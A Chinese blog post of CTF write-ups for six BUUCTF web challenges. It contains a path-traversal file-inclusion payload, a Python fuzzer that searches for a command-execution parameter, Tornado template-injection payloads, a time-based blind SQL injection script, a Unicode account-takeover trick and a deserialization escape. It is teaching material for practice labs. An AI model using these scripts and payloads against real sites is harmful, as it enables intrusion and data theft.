BUUCTF的Web真题学习整理(一)

最新推荐文章于 2024-05-16 07:20:57 发布
最新推荐文章于 2024-05-16 07:20:57 发布
阅读量5k 收藏 31
点赞数 9
分类专栏: CTF 文章标签: CTF WEB真题整理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41429081/article/details/98042205
版权

目录


BUU上的题基本都是比赛真题,还是很有借鉴意义的,安利一波https://buuoj.cn/。
例如在上次华东南赛区的比赛,就遇到了BUU上的WarmUp,所以这次整理一些BUU上的web题,没准下次还能遇到(๑•̀ㅂ•́)و✧,遇不到原题说不定会有一样的题型。

WEB1—WarmUp (任意文件包含漏洞)

第一步看源码
在这里插入图片描述
可以发现提示有source.php

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

观察源码逻辑,首先可以发现白名单是只有source.php和hint.php,通过访问hint.php我们可以知道flag在ffffllllaaaagggg文件中

在这里插入图片描述
但很明显我们无法直接访问,所以当然是继续分析逻辑
因为我们最后是想要读取ffffllllaaaagggg文件,所以很明显是要让代码执行到include $_REQUEST[‘file’];,传入file为ffffllllaaaagggg

mb_substr($page,0,mb_strpos($page.’?’,’?’))表示截取page中?之前的内容
所以判断既为true,就能通过判断条件

! empty($_REQUEST['file']) &&is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file'])

所以就能执行包含文件
payload:
http://web5.buuoj.cn/?file=source.php?../../../../../ffffllllaaaagggg
这边ffffllllaaaagggg文件前面的路径加…/是因为他和index.php不在同一个目录下,所以读取的是上级目录。
在这里插入图片描述

WEB2—高明的黑客(fuzz脚本)

在这里插入图片描述
这题给了www.tar.gz下载下来是3000多个php文件,每个php文件中都有很多post和get的参数,只有一个php中的一个参数是可以getshell的。给出一个多线程python爆破脚本,主要功能是读取我们下载下来的php文件,然后寻找所有GET和POST参数,发送给服务器,判断是否执行了我们传入的东西,来判断是不是一个可以getshell的点。

import requests
import re
import os
from time import sleep
flies = os.listdir('../src')

from multiprocessing.dummy import Pool as ThreadPool

        
def breakMe(sss):    # 输入范围 
    key = sss.split(':')
    start = int(key[0])   # 开始位置
    end = int(key[1])    # 结束位置

    for i in flies[start:end]:
        url = 'http://web15.buuoj.cn/'+i
        f = open('../src/'+i)
        data = f.read()
        f.close()
        reg = re.compile(r'(?<=_GET\[\').*(?=\'\])')
        params = reg.findall(data)
        for j in params:    
            payload = url + '?' + j + '=echo 123456123456123456123456'
            req=requests.get(payload)
            if '123456123456123456123456' in str(req.content):
                print (payload)
                exit()


list=[]  # 参数列表
for i in range(30):   # 多线程的数字列表 开始与结尾
        list.append(str(100*i) + ':' + str(100*(i+1)))
pool = ThreadPool()    # 多线程任务
pool.map(breakMe, list) # 函数 与参数列表
pool.close()
pool.join()

WEB3—easy_tornado (服务端模板注入(ssti攻击))

在这里插入图片描述
可以发现给了我们三个链接
在这里插入图片描述
在这里插入图片描述
flag是在/fllllllllllllag中的,但是访问这个文件是还有要一个filehash的参数,其值是md5(cookie_secret+md5(filename))规则加密的,主要我们需要知道的是cookie_secret的值

在我们直接访问http://web9.buuoj.cn/file?filename=/fllllllllllllag时发现页面跳转到了
在这里插入图片描述
提示有签名错误,发现/error?msg=Error,考虑服务端模板注入(ssti攻击)
尝试输入/error?msg={{1}},确实是存在模板注入
尝试输入/error?msg={{77}},不存在运算
之后进行各种尝试与资料获取发现对于tornado框架存在附属文件handler.settings,于是尝试输入/error?msg={{handler.settings}}
在这里插入图片描述
得到cookie_secret:M)Z.>}{O]lYIp(oW7$dc132uDaK<C%wqj@PA![VtR#geh9UHsbnL_+mT5N~J84r
再根据hint的加密规则算出filehash,便可以访问fllllllllllllag,得到flag

WEB4—Hack World(时间盲注)

在这里插入图片描述
延迟注入,是一种盲注的手法, 提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注.SQLMAP、穿山甲、胡萝卜等主流注入工具可能检测不出,只能手工检测,利用脚本程序跑出结果。

给出了table和column名,给的这么详细大概是时间盲注的概率会高一些吧。同时发现过滤了空格,给出时间盲注脚本

import requests
import time
url = "http://web43.buuoj.cn/index.php"
flag = ''
table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}"
#FLAG{5YK358DL6ME5EXXWO4MO2HJS5W0HADZ9}
while True:
    for i in table:
        ss = time.time()
        data = {
            'id':'''ELT(left((select    flag    from    flag),{})='{}{}',SLEEP(1))'''.format(len(flag)+1,flag, i)
        }
        data['id'] = data['id'].replace(" ","\t")
        requests.post(url,data=data)
        if time.time()-ss>=0.5:
            flag += i
            print (flag)
            break

WEB5—admin(unicode欺骗)

这题首先是登录注册
在这里插入图片描述
在这里插入图片描述
通过题目大概可以知道,需要我们以admin的身份登陆,然后我这边先注册admin发现已经存在,所以先随便注册一个登陆了上去,然后去找一些可以利用的地方。
在这里插入图片描述
在更换密码的地方找到了一个git,得到题目源码
在这里插入图片描述
这边重点的是
在这里插入图片描述

def strlower(username):
    username = nodeprep.prepare(username)
    return username

这边对如下字幕ᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘʀꜱᴛᴜᴠᴡʏᴢ
nodeprep.prepare会进行如下操作
ᴀ -> A -> a
所以经过这三步得到flag
注册用户ᴬdmin
登录用户ᴬdmin,变成Admin
修改密码Admin,更改了admin的密码
在这里插入图片描述
推荐博客https://www.anquanke.com/post/id/164086这题给出了三种解法
法1:伪造session
法2:unicode欺骗
法3:条件竞争

这边我也复现一下伪造session

使用的是这个github上的工具https://github.com/noraj/flask-session-cookie-manager
但没有复现成功,我对比了一下真实admin的session值和我伪造的session,应该整体上是没问题的,但是可能是由于这个工具和真实服务器构建session在最后一部分规则有差异还是怎么样,总之是没能复现成功,如果有找到更好用的工具的大佬可以指导我一下

WEB6—piapiapia (一个源码中有防止sql注入的反序列化漏洞)

buuctf上没有给出源码,看了那个0ctf的wp才会做
大概思路就是通过审计

$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);

发现一些sql关键字会被替换成hacker造成的一个漏洞

举个例子就是
s:10:“where1234"”; => s:10:“hacker1234"”
在反序列化的时候,因为s是10,所以会读10个字节,当where被替换成hacker后,就会逃逸掉一个引号。这样就可以构造我们想要逃逸内容个where实现控制反序列化后的内容

参考博客http://yqxiaojunjie.com/index.php/archives/171/

CTF小白
关注
  • 9
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF__web题解合集(十)
风过江南乱的博客
09-27 1683
1、[CISCN2019 华东南赛区]Web11 2、[BJDCTF 2nd]Schrödinger 3、[BJDCTF 2nd]duangShell 4、[BSidesCF 2019]Futurella 5、[网鼎杯 2018]Comment
BUUCTF-Web-题目详解(持续更新……)
AkangBoy的博客
12-11 4458
本文介绍BUUCTF平台上,web题目的详解过程,持续更新
BUUCTF--Web篇详细wp_buuctfweb
最新发布
2401_84247617的博客
05-16 958
Python编程学习学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
攻防世界Web题wp解析(难度4)
m0_63138919的博客
08-06 520
本文为攻防世界Web题难度为4的解题思路和方法
CTF杂项-BUUCTF竞赛真题WriteUp(2)
道阻且长,行则将至。
05-05 6895
文章目录前言No.1 Git动图分解提取信息No.2 隐藏文件提取与爆破N0.3 Base64编码还原图片No.4 winhex修改图片大小No.5 编辑器查看图片隐写 前言 为了划水过几天的“ 红帽杯 ” 网络安全大赛,学习并记录下 BUUCTF 平台的杂项部分题目,因为去年参加“ 强网杯 ”网络安全大赛发现杂项类型的题目还是可以争取得分的,也希望过几天运气好点吧… No.1 Git动图分解提取信息 下载附件发现是一个金三胖的动图,闪烁着红色 flag 字体(因三胖的图片被平台列为违规项目所以无法展示)。
BUUCTFweb部分题解
dogeace的博客
12-06 770
前一段时间没有发现比较基础的的平台去做题,直到上个星期我发现了一个比较基础的平台供我刷题,所以就继续更新wp了。废话不多说现在开始写题解。 题目名称[SUCTF 2019]EasySQL一级目录一级目录一级目录 [SUCTF 2019]EasySQL 先进入题目 因为题目的名称已经提示是SQL注入了,所以我们先进行尝试1’ or 1 = 1;# 提交发现 我当时的第一反应是布尔盲注所以我尝试了一下判断数据库的名称构造如下的payload 1' or (ascii(substr(database(),1,
2023年国科大机器学习考题一(真题
01-07
2023年国科大机器学习考题一(真题
2022年计算机基础真题整理.doc
11-18
2022年计算机基础真题整理.doc
网易真题整理
11-16
【标题】:“网易真题整理”是一份集合了网易公司历年笔试和面试题目的资源,旨在...总的来说,“网易真题整理”是一份全面的备考资源,通过深入学习和实践,求职者可以提升自身技能,更好地应对网易公司的招聘挑战。
CDGA真题学习.rar
02-20
附近为CDGA考试真题,供数据治理工程师考试认证学习
2022蓝桥杯Web大学组省赛真题
07-03
2022蓝桥杯Web组省赛真题是一份面向Web开发者的竞赛试题,旨在评估参赛者在Web开发领域的技能和能力。这份资源提供了省赛的真实题目,可供学习和练习使用。 该资源包含了一系列的编程问题,涵盖了Web开发的各个方面...
BUUCTF解题web十一道
qq_45837896的博客
05-26 1266
[2019极客大挑战]EASYSQL 到页面里发现是一个登录框 回想注入思路,先判断注入类型,然后尝试登陆绕过 使用万能密码username=’ or 1=1 or ‘1’=‘1’# &password=asd [2019极客大挑战]HAVEFUN 打开页面发现是一只猫猫,点了两下拖了两下发现没什么 然后老规矩F12查看有没有提示信息 发现有这么一段代码,可以对页面传参cat,传cat='dog’就执行了一段代码,不知道是什么,尝试了一下直接出了flag… [SUCTF]EASYSQL 进入发现是
Buuctf Http
Dexret的博客
12-07 2275
打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码 发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer:https://Sycsecret.buuoj.cn 添加完referer值后发现,又需要我们通过Syclover浏览器去访问该网页 修改User-Agent值 User-Agent:Syclover ..
分享几个做CTF的网站
weixin_46168073的博客
11-15 1万+
一、Bugku 算是我用过的比较好用的一个刷题网站,里面有WEB、MISC(杂项)、Crypto(密码)、Reverse、PWN的题目。有时还会有AWD复现的比赛。 网址:https://ctf.bugku.com/ 或者百度BugKu 二、CTFHub 这个应该算是一个比较新的地方,里面也有很多好玩的。 技能树里面也有很多提升的地方。 目前就这两个,而且的话,相对比价免费。因为送的币基本上用不玩。 总之,先把这两个平台的题目都做完,然后的话在搞...
A/libc:fatal signal 11(SIGSEGV).code 1, fault addr 0x0 in tid 26488 (VideoEncoder)
djh10000的博客
03-23 6506
在调试Camera模块;发现相同的代码在厂家提供的环境里边编译、就是ok的,在我们的源码树中编译,将HAL库推进去后、就会signal 11退出。 一、现象 1 F/libc ( 4250): Fatal signal 11 (SIGSEGV) at 0x00000000 (code=1), thread 4358 (CameraPreviewTh) 2 I/DE...
BUUCTF_MISC题解
热门推荐
m0_52885531的博客
05-30 2万+
BUUCTF_MISC题解 第二题 金三胖 将GIF图片用ps进行逐帧分解,可以得到三张特殊的照片 直接将三个照片里的内容拼接起来就好 第三题 二维码 下载好附件解压后发现是一个.png文件的二维码 用CQR扫描后得到二维码的结果 发现并没有得到想要的flag,并且提示我们flag并不在这李,那我们就用二进制编辑器打开看一看在哪里。 .png的文件尾是AE 42 60 82,按理来说在文件尾之后就应该结束,我们却发现png的文件尾后还跟着50 4B 03 04,这是.zip的文件头,说明在该照片
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1865
[RoarCTF 2019]Easy Java
CTFCTF竞赛介绍以及刷题网址
wangluoanquan111的博客
01-27 2036
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。PWN(溢出):PWN在黑客俚语中代表着攻破,取得权限,在CTF比赛中它代表着溢出类的题目,其中常见类型溢出漏洞有栈溢出、堆溢出。
BUUCTF—Crypto(完结版本—_—)
2301_76768121的博客
03-19 2076
BUUCTF-部分Crypto wp
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTFbuuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值